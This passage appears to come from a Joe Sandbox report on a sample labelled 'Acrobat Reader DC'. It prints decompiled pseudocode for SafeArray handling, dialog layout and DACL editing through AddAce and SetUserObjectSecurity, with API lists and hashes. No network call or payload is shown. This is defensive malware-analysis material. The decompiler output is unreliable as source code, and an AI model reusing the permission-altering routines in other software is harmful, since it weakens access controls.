				void* _t199;
				signed short* _t202;
				signed int _t204;
				signed int _t208;
				signed int _t210;
				intOrPtr* _t212;
				void* _t218;
				void* _t219;
				void* _t220;
				void* _t227;

				_t154 = _a8;
				_t100 =  *_t154 & 0x0000ffff;
				_t219 = _t218 - 0x2c;
				_t212 = _a4;
				if((_t100 & 0x00002000) == 0) {
					L13:
					return 0;
				} else {
					if((_t100 & 0x00004000) == 0) {
						_t154 = _t154[4];
						_v12 = _t154;
						_t202 = _t154;
					} else {
						_t202 =  *(_t154[4]);
						_v12 = _t202;
					}
					if(_t202 == 0) {
						goto L13;
					} else {
						E0040E950(_t212, _t154);
						 *((intOrPtr*)( *_t212 + 0x210)) =  *_t202;
						_t105 =  *_t212;
						_t155 = 0;
						if( *((intOrPtr*)(_t105 + 0x210)) > 0) {
							_t13 =  &(_t202[8]); // 0x479a60
							_t199 = 0x10c;
							_a8 = _t13;
							do {
								_a8 =  &(_a8[4]);
								 *(_t199 + _t105) =  *_a8;
								_t105 =  *_t212;
								_t155 = _t155 + 1;
								_t199 = _t199 + 4;
							} while (_t155 <  *((intOrPtr*)(_t105 + 0x210)));
						}
						E0040E830(_t212, _t155, 0);
						_t146 =  *( *_t212 + 8);
						_t157 = _t202[1] & 0x0000ffff;
						_t109 = _t157 & 0x00000f00;
						_t220 = _t219 + 4;
						_t227 = _t109 - 0x400;
						if(_t227 > 0) {
							__eflags = _t109 - 0x800;
							if(_t109 == 0x800) {
								_t110 =  &_v24;
								__imp__#23(_t202, _t110);
								__eflags = _t110;
								if(_t110 >= 0) {
									_t204 = 0;
									__eflags = _t146;
									if(__eflags > 0) {
										_a4 = 0;
										do {
											_push(0x10);
											_t113 = E004115D7(_t204, _t212, __eflags);
											_t220 = _t220 + 4;
											__eflags = _t113;
											if(_t113 == 0) {
												_t113 = 0;
												__eflags = 0;
											} else {
												 *_t113 = 0;
												 *((intOrPtr*)(_t113 + 8)) = 1;
												 *((intOrPtr*)(_t113 + 0xc)) = 0;
											}
											 *( *((intOrPtr*)( *_t212)) + _t204 * 4) = _t113;
											_v44 = 0x400c;
											_v36 = _a4 + _v24;
											E00468070( *( *((intOrPtr*)( *_t212)) + _t204 * 4),  &_v44);
											_a4 = _a4 + 0x10;
											_t204 = _t204 + 1;
											__eflags = _t204 - _t146;
										} while (__eflags < 0);
									}
									goto L57;
								}
								goto L58;
							} else {
								goto L30;
							}
						} else {
							if(_t227 == 0) {
								__imp__#23(_t202,  &_v20);
								__eflags = _t109;
								if(_t109 < 0) {
									goto L58;
								} else {
									_t208 = 0;
									__eflags = _t146;
									if(__eflags > 0) {
										do {
											_push(0x10);
											_t135 = E004115D7(_t208, _t212, __eflags);
											_t220 = _t220 + 4;
											__eflags = _t135;
											if(_t135 == 0) {
												_t135 = 0;
												__eflags = 0;
											} else {
												 *_t135 = 0;
												 *((intOrPtr*)(_t135 + 8)) = 1;
												 *((intOrPtr*)(_t135 + 0xc)) = 0;
											}
											 *( *((intOrPtr*)( *_t212)) + _t208 * 4) = _t135;
											_v44 = 9;
											_v36 = _v20 + _t208 * 4;
											E00468070( *( *((intOrPtr*)( *_t212)) + _t208 * 4),  &_v44);
											_t208 = _t208 + 1;
											__eflags = _t208 - _t146;
										} while (__eflags < 0);
									}
									__imp__#24(_v12);
									return 1;
								}
							} else {
								if(_t109 == 0x100) {
									__imp__#23(_t202,  &_v16);
									__eflags = _t109;
									if(_t109 >= 0) {
										_t210 = 0;
										__eflags = _t146;
										if(__eflags > 0) {
											do {
												_push(0x10);
												_t139 = E004115D7(_t210, _t212, __eflags);
												_t220 = _t220 + 4;
												__eflags = _t139;
												if(_t139 == 0) {
													_t139 = 0;
													__eflags = 0;
												} else {
													 *_t139 = 0;
													 *((intOrPtr*)(_t139 + 8)) = 1;
													 *((intOrPtr*)(_t139 + 0xc)) = 0;
												}
												 *( *((intOrPtr*)( *_t212)) + _t210 * 4) = _t139;
												_v44 = 8;
												_v36 =  *((intOrPtr*)(_v16 + _t210 * 4));
												E00468070( *( *((intOrPtr*)( *_t212)) + _t210 * 4),  &_v44);
												_t210 = _t210 + 1;
												__eflags = _t210 - _t146;
											} while (__eflags < 0);
										}
										L57:
										__imp__#24(_v12);
									}
									goto L58;
								} else {
									if(_t109 != 0x200) {
										L30:
										__eflags = _t157;
										if(_t157 >= 0) {
											goto L12;
										} else {
											__imp__#77(_t202,  &_a8);
											_t161 = _a8;
											_t120 = (_t161 & 0x0000ffff) + 0xfffffffe;
											__eflags = _t120 - 0x15;
											if(_t120 > 0x15) {
												L42:
												_t183 = _t161 & 0x0000ffff;
												__eflags = _t183 & 0x00004000;
												if((_t183 & 0x00004000) == 0) {
													goto L12;
												} else {
													goto L43;
												}
											} else {
												_t51 = _t120 + 0x46805a; // 0x6608558b
												switch( *((intOrPtr*)(( *_t51 & 0x000000ff) * 4 +  &M00468042))) {
													case 0:
														_a4 = 2;
														goto L36;
													case 1:
														L43:
														_a4 = 4;
														goto L36;
													case 2:
														_a4 = 8;
														goto L36;
													case 3:
														_a4 = 1;
														L36:
														_t121 =  &_v8;
														_push(_t121);
														_push(_t202);
														__imp__#23();
														__eflags = _t121;
														if(_t121 < 0) {
															L58:
															return 1;
														} else {
															_t205 = 0;
															__eflags = _t146;
															if(__eflags > 0) {
																do {
																	_push(0x10);
																	_t123 = E004115D7(_t205, _t212, __eflags);
																	_t220 = _t220 + 4;
																	__eflags = _t123;
																	if(_t123 == 0) {
																		_t123 = 0;
																		__eflags = 0;
																	} else {
																		 *_t123 = 0;
																		 *((intOrPtr*)(_t123 + 8)) = 1;
																		 *((intOrPtr*)(_t123 + 0xc)) = 0;
																	}
																	 *( *((intOrPtr*)( *_t212)) + _t205 * 4) = _t123;
																	_t124 = _a8;
																	_t163 = _t124 & 0x0000ffff;
																	__eflags = _t163 & 0x00004000;
																	if((_t163 & 0x00004000) == 0) {
																		_t187 = 0x00004000 | _t124;
																		__eflags = _t187;
																		_v44 = _t187;
																		_v36 = _v8;
																	} else {
																		_v44 = _t124;
																		E00410E60( &_v36, _v8, _a4);
																		_t220 = _t220 + 0xc;
																	}
																	E00468070( *( *((intOrPtr*)( *_t212)) + _t205 * 4),  &_v44);
																	_v8 = _v8 + _a4;
																	_t205 = _t205 + 1;
																	__eflags = _t205 - _t146;
																} while (__eflags < 0);
															}
															_push(_v12);
															__imp__#24();
															return 1;
														}
														goto L59;
													case 4:
														_t130 =  &_v8;
														_push(_t130);
														_push(_t202);
														__imp__#23();
														__eflags = _t130;
														if(__eflags < 0) {
															goto L12;
														} else {
															E00410E60(E00453132(_v8, __eflags, _t212, _t146), _v8, _t146);
															_push(_t202);
															__imp__#24();
															return 1;
														}
														goto L59;
													case 5:
														goto L42;
												}
											}
										}
									} else {
										L12:
										E00408F40(_t202, _t212);
										goto L13;
									}
								}
							}
						}
					}
				}
				L59:
			}




































                                  0x00467c91
                                  0x00467c94
                                  0x00467c97
                                  0x00467c9c
                                  0x00467ca5
                                  0x00467d53
                                  0x00467d5b
                                  0x00467cab
                                  0x00467cb0
                                  0x00467cbc
                                  0x00467cbf
                                  0x00467cc2
                                  0x00467cb2
                                  0x00467cb5
                                  0x00467cb7
                                  0x00467cb7
                                  0x00467cc6
                                  0x00000000
                                  0x00467ccc
                                  0x00467cce
                                  0x00467cd8
                                  0x00467cde
                                  0x00467ce0
                                  0x00467ce8
                                  0x00467cea
                                  0x00467ced
                                  0x00467cf2
                                  0x00467cf5
                                  0x00467cfa
                                  0x00467cfe
                                  0x00467d01
                                  0x00467d03
                                  0x00467d04
                                  0x00467d07
                                  0x00467cf5
                                  0x00467d13
                                  0x00467d1a
                                  0x00467d1d
                                  0x00467d23
                                  0x00467d28
                                  0x00467d2b
                                  0x00467d30
                                  0x00467e59
                                  0x00467e5e
                                  0x00467fbc
                                  0x00467fc1
                                  0x00467fc7
                                  0x00467fc9
                                  0x00467fcb
                                  0x00467fcd
                                  0x00467fcf
                                  0x00467fd1
                                  0x00467fd4
                                  0x00467fd4
                                  0x00467fd6
                                  0x00467fdb
                                  0x00467fde
                                  0x00467fe0
                                  0x00467ff8
                                  0x00467ff8
                                  0x00467fe2
                                  0x00467fe2
                                  0x00467fe8
                                  0x00467fef
                                  0x00467fef
                                  0x00467ffe
                                  0x0046800e
                                  0x00468012
                                  0x0046801e
                                  0x00468023
                                  0x00468027
                                  0x00468028
                                  0x00468028
                                  0x00467fd4
                                  0x00000000
                                  0x00467fcf
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00467d36
                                  0x00467d36
                                  0x00467ddc
                                  0x00467de2
                                  0x00467de4
                                  0x00000000
                                  0x00467dea
                                  0x00467dea
                                  0x00467dec
                                  0x00467dee
                                  0x00467df0
                                  0x00467df0
                                  0x00467df2
                                  0x00467df7
                                  0x00467dfa
                                  0x00467dfc
                                  0x00467e14
                                  0x00467e14
                                  0x00467dfe
                                  0x00467dfe
                                  0x00467e04
                                  0x00467e0b
                                  0x00467e0b
                                  0x00467e1a
                                  0x00467e2a
                                  0x00467e2e
                                  0x00467e3a
                                  0x00467e3f
                                  0x00467e40
                                  0x00467e40
                                  0x00467df0
                                  0x00467e48
                                  0x00467e56
                                  0x00467e56
                                  0x00467d3c
                                  0x00467d41
                                  0x00467d63
                                  0x00467d69
                                  0x00467d6b
                                  0x00467d71
                                  0x00467d73
                                  0x00467d75
                                  0x00467d7e
                                  0x00467d7e
                                  0x00467d80
                                  0x00467d85
                                  0x00467d88
                                  0x00467d8a
                                  0x00467da2
                                  0x00467da2
                                  0x00467d8c
                                  0x00467d8c
                                  0x00467d92
                                  0x00467d99
                                  0x00467d99
                                  0x00467da8
                                  0x00467db3
                                  0x00467dbc
                                  0x00467dc8
                                  0x00467dcd
                                  0x00467dce
                                  0x00467dce
                                  0x00467dd2
                                  0x0046802c
                                  0x00468030
                                  0x00468030
                                  0x00000000
                                  0x00467d43
                                  0x00467d48
                                  0x00467e64
                                  0x00467e64
                                  0x00467e66
                                  0x00000000
                                  0x00467e6c
                                  0x00467e71
                                  0x00467e77
                                  0x00467e7e
                                  0x00467e81
                                  0x00467e84
                                  0x00467f2c
                                  0x00467f2c
                                  0x00467f2f
                                  0x00467f35
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00467e8a
                                  0x00467e8a
                                  0x00467e91
                                  0x00000000
                                  0x00467f1a
                                  0x00000000
                                  0x00000000
                                  0x00467f3b
                                  0x00467f3b
                                  0x00000000
                                  0x00000000
                                  0x00467f23
                                  0x00000000
                                  0x00000000
                                  0x00467ed2
                                  0x00467ed9
                                  0x00467ed9
                                  0x00467edc
                                  0x00467edd
                                  0x00467ede
                                  0x00467ee4
                                  0x00467ee6
                                  0x00468036
                                  0x0046803e
                                  0x00467eec
                                  0x00467eec
                                  0x00467eee
                                  0x00467ef0
                                  0x00467ef6
                                  0x00467ef6
                                  0x00467ef8
                                  0x00467efd
                                  0x00467f00
                                  0x00467f02
                                  0x00467f44
                                  0x00467f44
                                  0x00467f04
                                  0x00467f04
                                  0x00467f0a
                                  0x00467f11
                                  0x00467f11
                                  0x00467f4a
                                  0x00467f4d
                                  0x00467f51
                                  0x00467f54
                                  0x00467f5a
                                  0x00467f7b
                                  0x00467f7b
                                  0x00467f81
                                  0x00467f85
                                  0x00467f5c
                                  0x00467f5f
                                  0x00467f6c
                                  0x00467f71
                                  0x00467f71
                                  0x00467f93
                                  0x00467f9b
                                  0x00467f9e
                                  0x00467f9f
                                  0x00467f9f
                                  0x00467ef6
                                  0x00467faa
                                  0x00467fab
                                  0x00467fb9
                                  0x00467fb9
                                  0x00000000
                                  0x00000000
                                  0x00467e98
                                  0x00467e9b
                                  0x00467e9c
                                  0x00467e9d
                                  0x00467ea3
                                  0x00467ea5
                                  0x00000000
                                  0x00467eab
                                  0x00467eb8
                                  0x00467ec0
                                  0x00467ec1
                                  0x00467ecf
                                  0x00467ecf
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00467e91
                                  0x00467e84
                                  0x00467d4e
                                  0x00467d4e
                                  0x00467d4e
                                  0x00000000
                                  0x00467d4e
                                  0x00467d48
                                  0x00467d41
                                  0x00467d36
                                  0x00467d30
                                  0x00467cc6
                                  0x00000000

                                  APIs
                                  • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467D63
                                  • SafeArrayAccessData.OLEAUT32(0000007F,0000007F), ref: 00467DDC
                                  • SafeArrayGetVartype.OLEAUT32(0000007F,?), ref: 00467E71
                                  • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00467E9D
                                  • _memmove.LIBCMT ref: 00467EB8
                                  • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00467EC1
                                  • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467EDE
                                  • _memmove.LIBCMT ref: 00467F6C
                                  • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467FC1
                                  • SafeArrayUnaccessData.OLEAUT32(00000004), ref: 00467FAB
                                    • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                    • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                    • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                  • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00467E48
                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                  • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00468030
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: ArraySafe$Data$Access$Unaccess$_memmovestd::exception::exception$Exception@8ThrowVartype_malloc
                                  • String ID:
                                  • API String ID: 2170234536-0
                                  • Opcode ID: aa00afaeb95d016149156b33273ce501c4b0800cd775f7336c4c4d99d01e60ec
                                  • Instruction ID: 6369f5c3f22445f0d5bf5c4520e4337682cbd46778e63a39b460943b9460954a
                                  • Opcode Fuzzy Hash: aa00afaeb95d016149156b33273ce501c4b0800cd775f7336c4c4d99d01e60ec
                                  • Instruction Fuzzy Hash: 26B124716042059FD700CF59D884BAEB7B5FF88308F24856EEA05DB351EB3AD845CB6A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004357B7 Relevance: 18.2, APIs: 12, Instructions: 184COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 93%
                                  			E004357B7(intOrPtr _a4, intOrPtr _a8, struct HWND__* _a12, struct HWND__* _a16) {
				struct tagRECT _v20;
				void* _t55;
				struct HWND__* _t57;
				struct HWND__* _t59;
				struct HWND__* _t61;
				struct HWND__* _t62;
				long _t67;
				signed int _t68;
				int _t69;
				long _t73;
				long _t83;
				signed int _t92;
				long _t99;
				signed int _t100;
				long _t103;
				signed int _t104;
				signed int _t108;
				int _t109;
				long _t113;
				signed int _t117;
				signed int _t119;
				long _t123;
				struct HWND__* _t127;
				int _t131;
				signed int _t133;

				_t92 = _a12;
				_t131 = 0;
				_t127 = _a16;
				if(_a8 != 1) {
					_t57 = GetDlgItem( *(_a4 + 0x54), 1);
					_a12 = _t57;
					if(_t57 != 0) {
						GetWindowRect(_t57,  &_v20);
						_t123 = _v20.left;
						_t83 = _v20.right;
						if(_t123 > _t83) {
							_t113 = _t123;
							_t123 = _t83;
							_t83 = _t113;
							_v20.left = _t123;
							_v20.right = _t83;
						}
						_t133 = _v20.top;
						_t108 = _v20.bottom;
						if(_t133 > _t108) {
							_a16 = _t133;
							_t133 = _t108;
							_t108 = _a16;
							_v20.top = _t133;
							_v20.bottom = _t108;
						}
						_t124 = _t83 - _t123;
						_t109 = _t108 - _t133;
						asm("cdq");
						asm("cdq");
						_t131 = _t127 - _t109 - 0xa;
						MoveWindow(_a12, (0xa - _t83 - _t123 - _t83 - _t123 >> 1) + (_t92 + (_t124 & 0x00000003) >> 2), _t131, _t124, _t109, 0);
					}
					_t59 = GetDlgItem( *(_a4 + 0x54), 2);
					_a16 = _t59;
					if(_t59 != 0) {
						GetWindowRect(_t59,  &_v20);
						_t103 = _v20.left;
						_t73 = _v20.right;
						if(_t103 > _t73) {
							_v20.left = _t73;
							_t73 = _t103;
							_v20.right = _t73;
						}
						_t119 = _v20.top;
						_t104 = _v20.bottom;
						if(_t119 > _t104) {
							_v20.top = _t104;
							_t104 = _t119;
							_v20.bottom = _t104;
						}
						_t74 = _t73 - _v20.left;
						asm("cdq");
						asm("cdq");
						MoveWindow(_a16, (_t92 + _t92 * 2 + (_t119 & 0x00000003) >> 2) - (_t73 - _v20.left + 0xa - _t119 >> 1), _t131, _t74, _t104 - _v20.top, 0);
					}
					_t61 = GetDlgItem( *(_a4 + 0x54), 0x3e9);
					_a16 = _t61;
					if(_t61 != 0) {
						GetWindowRect(_t61,  &_v20);
						_t67 = _v20.left;
						_t99 = _v20.right;
						if(_t67 > _t99) {
							_v20.left = _t99;
							_v20.right = _t67;
						}
						_t100 = _v20.top;
						_t68 = _v20.bottom;
						if(_t100 > _t68) {
							_t117 = _t100;
							_t100 = _t68;
							_t68 = _t117;
							_v20.top = _t100;
							_v20.bottom = _t68;
						}
						_t69 = _t68 - _t100;
						_t131 = _t131 + 0xfffffffb - _t69;
						MoveWindow(_a16, 0xa, _t131, _t92 - 0x14, _t69, 0);
					}
					_t62 = GetDlgItem( *(_a4 + 0x54), 0x3ea);
					if(_t62 != 0) {
						MoveWindow(_t62, 0xa, 0xa, _t92 + 0xffffffec, _t131 + 0xfffffffb, 0);
					}
					return InvalidateRect( *(_a4 + 0x54), 0, 1);
				}
				return _t55;
			}




























                                  0x004357be
                                  0x004357c2
                                  0x004357c9
                                  0x004357cc
                                  0x004357db
                                  0x004357e1
                                  0x004357e6
                                  0x004357ed
                                  0x004357f3
                                  0x004357f6
                                  0x004357fb
                                  0x004357fd
                                  0x004357ff
                                  0x00435801
                                  0x00435803
                                  0x00435806
                                  0x00435806
                                  0x00435809
                                  0x0043580c
                                  0x00435811
                                  0x00435813
                                  0x00435816
                                  0x00435818
                                  0x0043581b
                                  0x0043581e
                                  0x0043581e
                                  0x00435823
                                  0x00435825
                                  0x00435832
                                  0x0043583b
                                  0x00435844
                                  0x00435857
                                  0x00435857
                                  0x0043586a
                                  0x00435870
                                  0x00435875
                                  0x0043587c
                                  0x00435882
                                  0x00435885
                                  0x0043588a
                                  0x0043588c
                                  0x0043588f
                                  0x00435891
                                  0x00435891
                                  0x00435894
                                  0x00435897
                                  0x0043589c
                                  0x0043589e
                                  0x004358a1
                                  0x004358a3
                                  0x004358a3
                                  0x004358a6
                                  0x004358b3
                                  0x004358bb
                                  0x004358ce
                                  0x004358ce
                                  0x004358dc
                                  0x004358e2
                                  0x004358e7
                                  0x004358ee
                                  0x004358f4
                                  0x004358f7
                                  0x004358fc
                                  0x004358fe
                                  0x00435901
                                  0x00435901
                                  0x00435904
                                  0x00435907
                                  0x0043590c
                                  0x0043590e
                                  0x00435910
                                  0x00435912
                                  0x00435914
                                  0x00435917
                                  0x00435917
                                  0x0043591a
                                  0x0043592d
                                  0x00435933
                                  0x00435933
                                  0x00435941
                                  0x00435949
                                  0x0043595a
                                  0x0043595a
                                  0x00000000
                                  0x00435967
                                  0x00435973

                                  APIs
                                  • GetDlgItem.USER32 ref: 004357DB
                                  • GetWindowRect.USER32 ref: 004357ED
                                  • MoveWindow.USER32(?,0000000A,?,?,?,00000000), ref: 00435857
                                  • GetDlgItem.USER32 ref: 0043586A
                                  • GetWindowRect.USER32 ref: 0043587C
                                  • MoveWindow.USER32(?,?,00000000,?,00000001,00000000), ref: 004358CE
                                  • GetDlgItem.USER32 ref: 004358DC
                                  • GetWindowRect.USER32 ref: 004358EE
                                  • MoveWindow.USER32(?,0000000A,00000000,?,?,00000000), ref: 00435933
                                  • GetDlgItem.USER32 ref: 00435941
                                  • MoveWindow.USER32(00000000,0000000A,0000000A,?,-000000FB,00000000), ref: 0043595A
                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00435967
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Window$ItemMoveRect$Invalidate
                                  • String ID:
                                  • API String ID: 3096461208-0
                                  • Opcode ID: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                                  • Instruction ID: 6af1b44a8b8b1dd3dfd8c00d901dfbe31295268d39f582813a56aed3f3dd18d2
                                  • Opcode Fuzzy Hash: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                                  • Instruction Fuzzy Hash: 7C515FB1B00609ABCB18DF68CD95AAEB7B9EF88310F148529F905E7390E774ED008B54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00445F35 Relevance: 18.2, APIs: 12, Instructions: 182COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00445F35(void* __eflags, void* _a4, void* _a8, intOrPtr _a12) {
				char _v5;
				struct _ACL* _v12;
				void* _v16;
				struct _ACL* _v20;
				struct _ACL* _v24;
				long _v28;
				char _v32;
				int _v36;
				int _v40;
				intOrPtr _v48;
				void _v52;
				struct _ACL* _t70;
				void* _t74;
				void* _t78;
				void* _t84;
				void _t88;
				struct _ACL* _t94;
				signed short _t113;
				intOrPtr* _t115;
				struct _SECURITY_DESCRIPTOR* _t116;
				long _t117;
				void* _t118;
				void* _t119;

				_t118 = 0;
				_t94 = 0;
				_v5 = 0;
				_v20 = 0;
				_v24 = 0;
				_v16 = 0;
				_v28 = 4;
				if(E00436E2B(_a4,  &_v28,  &_v20,  &_v32) == 0 || E00436DF7( &_v24, _v32) == 0) {
					L20:
					E00436BA9(_v20);
					E00436BA9(_v24);
					E00436BA9(_t94);
					E00436BA9(_t118);
					return _v5;
				} else {
					_v12 = 0;
					if(GetSecurityDescriptorDacl(_v20,  &_v36,  &_v12,  &_v40) == 0) {
						goto L20;
					}
					E00412F40( &_v52, 0, 0xc);
					_t70 = _v12;
					_t119 = _t119 + 0xc;
					_v48 = 8;
					if(_t70 == 0 || GetAclInformation(_t70,  &_v52, 0xc, 2) != 0) {
						_t24 = GetLengthSid(_a8) * 2; // 0x18
						_t74 = E00436DBF( &_v16, _v48 + _t24 + 0x10);
						_t94 = _v16;
						if(_t74 == 0) {
							goto L20;
						}
						if(_v36 == _t118) {
							L12:
							_t36 = GetLengthSid(_a8) + 8; // 0x8
							_t113 = _t36;
							_t118 = E00436B91(_t113);
							_t119 = _t119 + 4;
							if(_t118 == 0) {
								goto L20;
							}
							_t78 = _a8;
							_t38 = _t118 + 8; // 0x8
							 *(_t118 + 2) = _t113;
							if(CopySid(GetLengthSid(_t78), _t38, _t78) == 0) {
								goto L20;
							}
							_a8 = 0;
							_t115 = _a12 + 4;
							while(1) {
								 *_t118 =  *((intOrPtr*)(_t115 - 4));
								 *((char*)(_t118 + 1)) =  *((intOrPtr*)(_t115 - 3));
								 *((intOrPtr*)(_t118 + 4)) =  *_t115;
								if(AddAce(_t94, 2, 0xffffffff, _t118,  *(_t118 + 2) & 0x0000ffff) == 0) {
									goto L20;
								}
								_t84 = _a8 + 1;
								_t115 = _t115 + 0xc;
								_a8 = _t84;
								if(_t84 < 1) {
									continue;
								}
								_t116 = _v24;
								if(SetSecurityDescriptorDacl(_t116, 1, _t94, 0) != 0 && SetUserObjectSecurity(_a4,  &_v28, _t116) != 0) {
									_v5 = 1;
								}
								goto L20;
							}
							goto L20;
						}
						_t88 = _v52;
						if(_t88 == _t118) {
							goto L12;
						}
						_t117 = 0;
						if(_t88 <= _t118) {
							goto L12;
						}
						while(GetAce(_v12, _t117,  &_v16) != 0 && AddAce(_t94, 2, 0xffffffff, _v16,  *(_v16 + 2) & 0x0000ffff) != 0) {
							_t117 = _t117 + 1;
							if(_t117 < _v52) {
								continue;
							}
							goto L12;
						}
					}
					goto L20;
				}
			}


























                                  0x00445f4d
                                  0x00445f4f
                                  0x00445f52
                                  0x00445f56
                                  0x00445f59
                                  0x00445f5c
                                  0x00445f5f
                                  0x00445f6d
                                  0x004460f7
                                  0x004460fb
                                  0x00446104
                                  0x0044610a
                                  0x00446110
                                  0x00446121
                                  0x00445f88
                                  0x00445f98
                                  0x00445fa3
                                  0x00000000
                                  0x00000000
                                  0x00445fb0
                                  0x00445fb5
                                  0x00445fb8
                                  0x00445fbb
                                  0x00445fc4
                                  0x00445fea
                                  0x00445ff3
                                  0x00445ff8
                                  0x00445ffd
                                  0x00000000
                                  0x00000000
                                  0x00446006
                                  0x0044604e
                                  0x00446058
                                  0x00446058
                                  0x00446061
                                  0x00446063
                                  0x00446068
                                  0x00000000
                                  0x00000000
                                  0x0044606e
                                  0x00446072
                                  0x00446077
                                  0x0044608a
                                  0x00000000
                                  0x00000000
                                  0x0044608f
                                  0x00446096
                                  0x00446099
                                  0x004460a1
                                  0x004460ae
                                  0x004460b1
                                  0x004460bc
                                  0x00000000
                                  0x00000000
                                  0x004460c1
                                  0x004460c2
                                  0x004460c5
                                  0x004460cb
                                  0x00000000
                                  0x00000000
                                  0x004460cd
                                  0x004460de
                                  0x004460f3
                                  0x004460f3
                                  0x00000000
                                  0x004460de
                                  0x00000000
                                  0x00446099
                                  0x00446008
                                  0x0044600d
                                  0x00000000
                                  0x00000000
                                  0x0044600f
                                  0x00446013
                                  0x00000000
                                  0x00000000
                                  0x00446015
                                  0x00446048
                                  0x0044604c
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0044604c
                                  0x00446015
                                  0x00000000
                                  0x00445fc4

                                  APIs
                                    • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00436E45
                                    • Part of subcall function 00436E2B: GetLastError.KERNEL32(?,00000000,?), ref: 00436E4F
                                    • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00436E75
                                    • Part of subcall function 00436DF7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00436E12
                                  • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00445F9B
                                  • _memset.LIBCMT ref: 00445FB0
                                  • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00445FCF
                                  • GetLengthSid.ADVAPI32(?), ref: 00445FE1
                                  • GetAce.ADVAPI32(?,00000000,?), ref: 0044601E
                                  • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0044603A
                                  • GetLengthSid.ADVAPI32(?), ref: 00446052
                                  • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0044607B
                                  • CopySid.ADVAPI32(00000000), ref: 00446082
                                  • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004460B4
                                  • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004460D6
                                  • SetUserObjectSecurity.USER32 ref: 004460E9
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
